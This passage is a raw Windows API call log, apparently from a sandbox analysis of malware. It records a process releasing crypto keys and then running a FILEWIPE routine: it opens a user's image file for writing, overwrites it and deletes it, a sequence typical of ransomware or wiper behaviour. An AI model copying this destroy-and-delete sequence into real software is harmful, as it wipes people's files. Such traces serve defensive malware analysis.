lpMsg=0x6aed6c) returned 0 [0039.420] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.420] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.420] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.421] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0039.421] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.421] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.421] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.421] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.421] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.421] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.421] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.421] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0039.421] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.421] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.422] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.422] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.422] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.422] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.422] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.422] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.422] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0039.422] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.422] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.423] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.423] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.423] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0039.423] FreeLibrary (hLibModule=0x754b0000) returned 1 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.423] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.424] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.424] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.425] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.425] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0039.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0039.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1a3d90, ftCreationTime.dwHighDateTime=0x1d5bcad, ftLastAccessTime.dwLowDateTime=0x38fb4360, ftLastAccessTime.dwHighDateTime=0x1d5c4a0, ftLastWriteTime.dwLowDateTime=0x38fb4360, ftLastWriteTime.dwHighDateTime=0x1d5c4a0, nFileSizeHigh=0x0, nFileSizeLow=0x1801b, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AwaHoW6K ZD3.png", cAlternateFileName="AWAHOW~1.PNG")) returned 0x7c2100 [0039.425] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0039.425] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.425] CharLowerBuffW (in: lpsz="byte[98331]", cchLength=0xb | out: lpsz="byte[98331]") returned 0xb [0039.425] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.426] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.426] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.426] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0039.426] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0039.426] FreeLibrary (hLibModule=0x76b40000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0039.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.426] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.426] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.427] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.427] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0039.427] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.428] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\awahow6k zd3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0039.428] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.428] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.428] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.428] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.428] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0039.428] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.428] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.429] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.429] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0039.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.429] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.429] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.429] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.429] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.429] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", lpFilePart=0x0) returned 0x37 [0039.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1a3d90, ftCreationTime.dwHighDateTime=0x1d5bcad, ftLastAccessTime.dwLowDateTime=0x38fb4360, ftLastAccessTime.dwHighDateTime=0x1d5c4a0, ftLastWriteTime.dwLowDateTime=0x17369880, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1801b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AwaHoW6K ZD3.png", cAlternateFileName="AWAHOW~1.PNG")) returned 0x7c2100 [0039.429] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AwaHoW6K ZD3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\awahow6k zd3.png")) returned 1 [0039.431] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1a3d90, ftCreationTime.dwHighDateTime=0x1d5bcad, ftLastAccessTime.dwLowDateTime=0x38fb4360, ftLastAccessTime.dwHighDateTime=0x1d5c4a0, ftLastWriteTime.dwLowDateTime=0x17369880, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1801b, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="AwaHoW6K ZD3.png", cAlternateFileName="AWAHOW~1.PNG")) returned 0 [0039.431] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.431] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.432] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.432] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.432] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.432] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.432] RtlAllocateHeap 